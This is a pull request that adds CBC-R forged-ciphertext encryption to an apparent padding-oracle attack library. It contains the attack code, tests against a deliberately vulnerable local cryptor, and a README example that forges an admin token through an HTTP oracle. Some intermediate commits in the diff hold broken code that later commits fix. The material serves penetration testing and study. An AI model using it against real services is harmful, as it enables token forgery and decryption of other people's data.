### PR TITLE
Add encryption support

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,3 +1,4 @@
+
 # Padding Oracle Python Automation Script 
 
 ![python-package-badge](https://github.com/djosix/padding_oracle.py/actions/workflows/python-package.yml/badge.svg)
@@ -30,7 +31,7 @@ Performance of padding_oracle.py was evaluated using [0x09] Cathub Party from ED
 | 64              | 56s            |
 
 ## How to Use 
-
+### Decryption
 To illustrate the usage, consider an example of testing `https://vulnerable.website/api/?token=M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94%3D`:
 
 ```python
@@ -61,6 +62,42 @@ plaintext = padding_oracle(
     block_size = 16,
     oracle = oracle,
     num_threads = 16,
+)
+```
+### Encryption
+To illustrate the usage, consider an example of forging a token for`https://vulnerable.website/api/?token=<.....>`:
+
+```python
+from padding_oracle import padding_oracle, base64_encode, base64_decode
+import requests
+
+sess = requests.Session() # use connection pool
+url = 'https://vulnerable.website/api/'
+
+def oracle(ciphertext: bytes):
+    resp = sess.get(url, params={'token': base64_encode(ciphertext)})
+
+    if 'failed' in resp.text:
+        return False # e.g. token decryption failed
+    elif 'success' in resp.text:
+        return True
+    else:
+        raise RuntimeError('unexpected behavior')
+
+def pad(data: bytes, block_size=16):
+	pad_value = block_size - len(data) % block_size
+	return text + bytearray([pad_value for i in range(pad_value)])
+
+payload: bytes =b"{'username':'admin'}"
+payload = pad(payload)
+assert len(payload) % 16 == 0
+
+ciphertext = padding_oracle(
+    payload,
+    block_size = 16,
+    oracle = oracle,
+    num_threads = 16,
+    mode = 'encrypt'
 )
 ```
 

--- a/README.md
+++ b/README.md
@@ -1,4 +1,3 @@
-
 # Padding Oracle Python Automation Script 
 
 ![python-package-badge](https://github.com/djosix/padding_oracle.py/actions/workflows/python-package.yml/badge.svg)
@@ -30,8 +29,10 @@ Performance of padding_oracle.py was evaluated using [0x09] Cathub Party from ED
 | 16              | 1m 20s         |
 | 64              | 56s            |
 
-## How to Use 
+## How to Use
+
 ### Decryption
+
 To illustrate the usage, consider an example of testing `https://vulnerable.website/api/?token=M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94%3D`:
 
 ```python
@@ -64,8 +65,10 @@ plaintext = padding_oracle(
     num_threads = 16,
 )
 ```
+
 ### Encryption
-To illustrate the usage, consider an example of forging a token for`https://vulnerable.website/api/?token=<.....>`:
+
+To illustrate the usage, consider an example of forging a token for `https://vulnerable.website/api/?token=<.....>` :
 
 ```python
 from padding_oracle import padding_oracle, base64_encode, base64_decode
@@ -84,13 +87,7 @@ def oracle(ciphertext: bytes):
     else:
         raise RuntimeError('unexpected behavior')
 
-def pad(data: bytes, block_size=16):
-    pad_value = block_size - len(data) % block_size
-    return data + bytearray([pad_value for i in range(pad_value)])
-
 payload: bytes =b"{'username':'admin'}"
-payload = pad(payload)
-assert len(payload) % 16 == 0
 
 ciphertext = padding_oracle(
     payload,

--- a/README.md
+++ b/README.md
@@ -85,8 +85,8 @@ def oracle(ciphertext: bytes):
         raise RuntimeError('unexpected behavior')
 
 def pad(data: bytes, block_size=16):
-	pad_value = block_size - len(data) % block_size
-	return text + bytearray([pad_value for i in range(pad_value)])
+    pad_value = block_size - len(data) % block_size
+    return data + bytearray([pad_value for i in range(pad_value)])
 
 payload: bytes =b"{'username':'admin'}"
 payload = pad(payload)

--- a/src/padding_oracle/legacy.py
+++ b/src/padding_oracle/legacy.py
@@ -33,6 +33,7 @@ __all__ = [
     'padding_oracle',
 ]
 
+
 def padding_oracle(payload: Union[bytes, str],
                    block_size: int,
                    oracle: OracleFunc,
@@ -93,13 +94,13 @@ def padding_oracle(payload: Union[bytes, str],
     payload = to_bytes(payload)
     null_byte = to_bytes(null_byte)
 
-
     # Does the user want the encryption routine
     if (mode == 'encrypt'):
         return encrypt(payload, block_size, oracle, num_threads, null_byte, pad_payload, logger)
 
     # If not continue with decryption as normal
     return decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger)
+
 
 def decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger):
     # Wrapper to handle exceptions from the oracle function
@@ -171,20 +172,21 @@ def encrypt(payload, block_size, oracle, num_threads, null_byte, pad_payload, lo
 
     plaintext_blocks = blocks(payload)
     ciphertext_blocks = [null_byte * block_size for _ in range(len(plaintext_blocks)+1)]
-    
+
     solve_index = '1'
     block_total = str(len(plaintext_blocks))
 
     for index in range(len(plaintext_blocks)-1, -1, -1):
         plaintext = solve(b'\x00' * block_size + ciphertext_blocks[index+1], block_size, wrapped_oracle,
-                            num_threads, result_callback, plaintext_callback)
+                          num_threads, result_callback, plaintext_callback)
         ciphertext_blocks[index] = bytes_xor(plaintext_blocks[index], plaintext)
         solve_index = str(int(solve_index)+1)
-    
+
     ciphertext = b''.join(ciphertext_blocks)
     logger.info(f"forged ciphertext: {ciphertext}")
 
     return ciphertext
+
 
 def get_logger():
     logger = logging.getLogger('padding_oracle')

--- a/src/padding_oracle/legacy.py
+++ b/src/padding_oracle/legacy.py
@@ -40,7 +40,7 @@ def padding_oracle(payload: Union[bytes, str],
                    log_level: int = logging.INFO,
                    null_byte: bytes = b' ',
                    return_raw: bool = False,
-                   mode: Union[bool, str] = 'encrypt',
+                   mode: Union[bool, str] = 'decrypt',
                    ) -> Union[bytes, List[int]]:
     '''
     Run padding oracle attack to decrypt ciphertext given a function to check
@@ -92,14 +92,14 @@ def padding_oracle(payload: Union[bytes, str],
     null_byte = to_bytes(null_byte)
 
 
-    # encryption routine
-    if mode == 'encrypt' or mode:
-        return encrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger)
+    # Does the user want the encryption routine
+    if (mode == 'encrypt') or (mode == True):
+        return encrypt(payload, block_size, oracle, num_threads, null_byte, logger)
 
-    # otherwise continue with decryption as normal
-    return decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger):
+    # If not continue with decryption as normal
+    return decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger)
 
-def encrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger):
+def decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger):
     # Wrapper to handle exceptions from the oracle function
     def wrapped_oracle(ciphertext: bytes):
         try:
@@ -126,9 +126,11 @@ def encrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, log
     if not return_raw:
         plaintext = convert_to_bytes(plaintext, null_byte)
         plaintext = remove_padding(plaintext)
+    
+    return plaintext
 
 
-def decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger):
+def encrypt(payload, block_size, oracle, num_threads, null_byte, logger):
     # Wrapper to handle exceptions from the oracle function
     def wrapped_oracle(ciphertext: bytes):
         try:
@@ -150,18 +152,18 @@ def decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, log
         logger.info(f'plaintext: {plaintext}')
 
     def blocks(data: bytes):
-        return [data[i:(i+block_size)] for i in range(0, len(data), block_size)]
+        return [data[index:(index+block_size)] for index in range(0, len(data), block_size)]
 
     def bytes_xor(byte_string_1: bytes, byte_string_2: bytes):
         return bytes([_a ^ _b for _a, _b in zip(byte_string_1, byte_string_2)])
 
     plaintext_blocks = blocks(payload)
-    ciphertext_blocks = [null_byte * block_size for i in range(len(plaintext_blocks)+1)]
+    ciphertext_blocks = [null_byte * block_size for _ in range(len(plaintext_blocks)+1)]
     
     for index in range(len(plaintext_blocks)-1, -1, -1):
         plaintext = solve(b'\x00' * block_size + ciphertext_blocks[index+1], block_size, wrapped_oracle,
                             num_threads, result_callback, plaintext_callback)
-        ciphertext_blocks[i] = bytes_xor(plaintext_blocks[index], plaintext)
+        ciphertext_blocks[index] = bytes_xor(plaintext_blocks[index], plaintext)
     
     ciphertext = b''.join(ciphertext_blocks)
     return ciphertext

--- a/src/padding_oracle/legacy.py
+++ b/src/padding_oracle/legacy.py
@@ -33,21 +33,21 @@ __all__ = [
     'padding_oracle',
 ]
 
-
-def padding_oracle(ciphertext: Union[bytes, str],
+def padding_oracle(payload: Union[bytes, str],
                    block_size: int,
                    oracle: OracleFunc,
                    num_threads: int = 1,
                    log_level: int = logging.INFO,
                    null_byte: bytes = b' ',
                    return_raw: bool = False,
+                   mode: Union[bool, str] = 'encrypt',
                    ) -> Union[bytes, List[int]]:
     '''
     Run padding oracle attack to decrypt ciphertext given a function to check
     wether the ciphertext can be decrypted successfully.
 
     Args:
-        ciphertext     (bytes|str) the ciphertext you want to decrypt
+        payload        (bytes|str) the payload you want to encrypt/decrypt
         block_size     (int)       block size (the ciphertext length should be
                                    multiple of this)
         oracle         (function)  a function: oracle(ciphertext: bytes) -> bool
@@ -58,33 +58,48 @@ def padding_oracle(ciphertext: Union[bytes, str],
                                    set (default: None)
         return_raw     (bool)      do not convert plaintext into bytes and
                                    unpad (default: False)
+        mode           (bool|str)  encrypt the payload (defaut: False/'decrypt')
+
 
     Returns:
-        plaintext (bytes|List[int]) the decrypted plaintext
+        result (bytes|List[int]) the processed payload
     '''
 
     # Check args
     if not callable(oracle):
         raise TypeError('the oracle function should be callable')
-    if not isinstance(ciphertext, (bytes, str)):
-        raise TypeError('ciphertext should have type bytes')
+    if not isinstance(payload, (bytes, str)):
+        raise TypeError('payload should have type bytes')
     if not isinstance(block_size, int):
         raise TypeError('block_size should have type int')
-    if not len(ciphertext) % block_size == 0:
-        raise ValueError('ciphertext length should be multiple of block size')
+    if not len(payload) % block_size == 0:
+        raise ValueError('payload length should be multiple of block size')
     if not 1 <= num_threads <= 1000:
         raise ValueError('num_threads should be in [1, 1000]')
     if not isinstance(null_byte, (bytes, str)):
         raise TypeError('expect null with type bytes or str')
     if not len(null_byte) == 1:
         raise ValueError('null byte should have length of 1')
+    if not isinstance(mode, (bool, str)):
+        raise TypeError('expect mode with type bool or str')
+    if isinstance(mode, str) and mode not in ('encrypt', 'decrypt'):
+        raise ValueError('mode must be either encrypt or decrypt')
 
     logger = get_logger()
     logger.setLevel(log_level)
 
-    ciphertext = to_bytes(ciphertext)
+    payload = to_bytes(payload)
     null_byte = to_bytes(null_byte)
 
+
+    # encryption routine
+    if mode == 'encrypt' or mode:
+        return encrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger)
+
+    # otherwise continue with decryption as normal
+    return decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger):
+
+def encrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger):
     # Wrapper to handle exceptions from the oracle function
     def wrapped_oracle(ciphertext: bytes):
         try:
@@ -105,15 +120,51 @@ def padding_oracle(ciphertext: Union[bytes, str],
         plaintext = convert_to_bytes(plaintext, null_byte)
         logger.info(f'plaintext: {plaintext}')
 
-    plaintext = solve(ciphertext, block_size, wrapped_oracle, num_threads,
+    plaintext = solve(payload, block_size, wrapped_oracle, num_threads,
                       result_callback, plaintext_callback)
 
     if not return_raw:
         plaintext = convert_to_bytes(plaintext, null_byte)
         plaintext = remove_padding(plaintext)
 
-    return plaintext
 
+def decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger):
+    # Wrapper to handle exceptions from the oracle function
+    def wrapped_oracle(ciphertext: bytes):
+        try:
+            return oracle(ciphertext)
+        except Exception as e:
+            logger.error(f'error in oracle with {ciphertext!r}, {e}')
+            logger.debug('error details: {}'.format(traceback.format_exc()))
+        return False
+
+    def result_callback(result: ResultType):
+        if isinstance(result, Fail):
+            if result.is_critical:
+                logger.critical(result.message)
+            else:
+                logger.error(result.message)
+
+    def plaintext_callback(plaintext: bytes):
+        plaintext = convert_to_bytes(plaintext, null_byte)
+        logger.info(f'plaintext: {plaintext}')
+
+    def blocks(data: bytes):
+        return [data[i:(i+block_size)] for i in range(0, len(data), block_size)]
+
+    def bytes_xor(byte_string_1: bytes, byte_string_2: bytes):
+        return bytes([_a ^ _b for _a, _b in zip(byte_string_1, byte_string_2)])
+
+    plaintext_blocks = blocks(payload)
+    ciphertext_blocks = [null_byte * block_size for i in range(len(plaintext_blocks)+1)]
+    
+    for index in range(len(plaintext_blocks)-1, -1, -1):
+        plaintext = solve(b'\x00' * block_size + ciphertext_blocks[index+1], block_size, wrapped_oracle,
+                            num_threads, result_callback, plaintext_callback)
+        ciphertext_blocks[i] = bytes_xor(plaintext_blocks[index], plaintext)
+    
+    ciphertext = b''.join(ciphertext_blocks)
+    return ciphertext
 
 def get_logger():
     logger = logging.getLogger('padding_oracle')

--- a/src/padding_oracle/solve.py
+++ b/src/padding_oracle/solve.py
@@ -39,6 +39,7 @@ __all__ = [
     'add_padding'
 ]
 
+
 class Pass(NamedTuple):
     block_index: int
     solved: List[int]
@@ -265,6 +266,7 @@ def remove_padding(data: Union[str, bytes, List[int]]) -> bytes:
     '''
     data = to_bytes(data)
     return data[:-data[-1]]
+
 
 def add_padding(data: Union[str, bytes, List[int]], block_size: int) -> bytes:
     '''

--- a/src/padding_oracle/solve.py
+++ b/src/padding_oracle/solve.py
@@ -38,7 +38,6 @@ __all__ = [
     'remove_padding',
 ]
 
-
 class Pass(NamedTuple):
     block_index: int
     solved: List[int]

--- a/src/padding_oracle/solve.py
+++ b/src/padding_oracle/solve.py
@@ -36,6 +36,7 @@ __all__ = [
     'solve',
     'convert_to_bytes',
     'remove_padding',
+    'add_padding'
 ]
 
 class Pass(NamedTuple):
@@ -264,3 +265,11 @@ def remove_padding(data: Union[str, bytes, List[int]]) -> bytes:
     '''
     data = to_bytes(data)
     return data[:-data[-1]]
+
+def add_padding(data: Union[str, bytes, List[int]], block_size: int) -> bytes:
+    '''
+    Add PKCS#7 padding bytes.
+    '''
+    data = to_bytes(data)
+    pad_len = block_size - len(data) % block_size
+    return data + (bytes([pad_len]) * pad_len)

--- a/tests/test_padding_oracle.py
+++ b/tests/test_padding_oracle.py
@@ -1,3 +1,4 @@
+from cryptography.hazmat.primitives import padding
 from padding_oracle import padding_oracle
 from .cryptor import VulnerableCryptor
 
@@ -14,6 +15,21 @@ def test_padding_oracle_basic():
 
     assert decrypted == plaintext
 
+def test_padding_oracle_encryption():
+    cryptor = VulnerableCryptor()
+
+    plaintext = b'the quick brown fox jumps over the lazy dog'
+    ciphertext = cryptor.encrypt(plaintext)
+
+    padder = padding.PKCS7(128).padder()
+    payload = padder.update(plaintext) + padder.finalize()
+
+    encrypted = padding_oracle(payload, cryptor.block_size,
+                               cryptor.oracle, 4, null_byte=b'?', mode='encrypt')
+    print(encrypted)
+
+    assert encrypted == ciphertext
 
 if __name__ == '__main__':
     test_padding_oracle_basic()
+    test_padding_oracle_encryption()

--- a/tests/test_padding_oracle.py
+++ b/tests/test_padding_oracle.py
@@ -21,10 +21,7 @@ def test_padding_oracle_encryption():
     plaintext = b'the quick brown fox jumps over the lazy dog'
     ciphertext = cryptor.encrypt(plaintext)
 
-    padder = padding.PKCS7(128).padder()
-    payload = padder.update(plaintext) + padder.finalize()
-    
-    encrypted = padding_oracle(payload, cryptor.block_size,
+    encrypted = padding_oracle(plaintext, cryptor.block_size,
                                cryptor.oracle, 4, null_byte=b'?', mode='encrypt')
     decrypted = cryptor.decrypt(encrypted)
 

--- a/tests/test_padding_oracle.py
+++ b/tests/test_padding_oracle.py
@@ -23,12 +23,12 @@ def test_padding_oracle_encryption():
 
     padder = padding.PKCS7(128).padder()
     payload = padder.update(plaintext) + padder.finalize()
-
+    
     encrypted = padding_oracle(payload, cryptor.block_size,
                                cryptor.oracle, 4, null_byte=b'?', mode='encrypt')
-    print(encrypted)
+    decrypted = cryptor.decrypt(encrypted)
 
-    assert encrypted == ciphertext
+    assert decrypted == plaintext
 
 if __name__ == '__main__':
     test_padding_oracle_basic()


### PR DESCRIPTION
# Adding Encryption Support
As demonstrated by Rizzo and Duong<sup>[1]</sup> padding oracles in CBC encryption implementations can be used to form an encryption oracle, allowing an attacker to forge valid ciphertexts without knowing the secret key. This PR contains a rather quick implementation of the CBC-R attack, tests for this encryption mode and an updated README file. The changes are not breaking, with the default behaviour remaining the original decryption routine. Wrapping functions have been duplicated for the encryption routine to allow for modification to better suite it in future, but this is beyond what I need right now and as such they have been left unchanged.

### The CBC-R attack:
for a padded plaintext we want to encrypt, we divide it into _n_ blocks and _n+1_ random ciphertext blocks. For each ciphertext block, starting at the _(n+1)th_ block we use the standard padding oracle attack to decrypt that block with an IV of all null bytes, effectively finding the raw decryption of that block. We then xor that decrypted block with the _nth_ plaintext block and set the _nth_ ciphertext block to the result of that operation.

**python-esque pseudocode:**
```python
plaintext = [b'test_plaintext_t', b'wo_blocks\x07\x07\x07\x07\x07\x07\x07']
ciphertext = [b'A'*16 for i in range(len(plaintext))]
for i in range(len(plaintext)-1, -1, -1):
     ciphertext[i] = xor(plaintext[i], decrypt(ciphertext[i+1], IV=b"\x00"*16))
```


[1]: Juliano Rizzo; Thai Duong (25 May 2010). [Practical Padding Oracle Attacks](http://www.usenix.org/event/woot10/tech/full_papers/Rizzo.pdf) (PDF). USENIX WOOT 2010.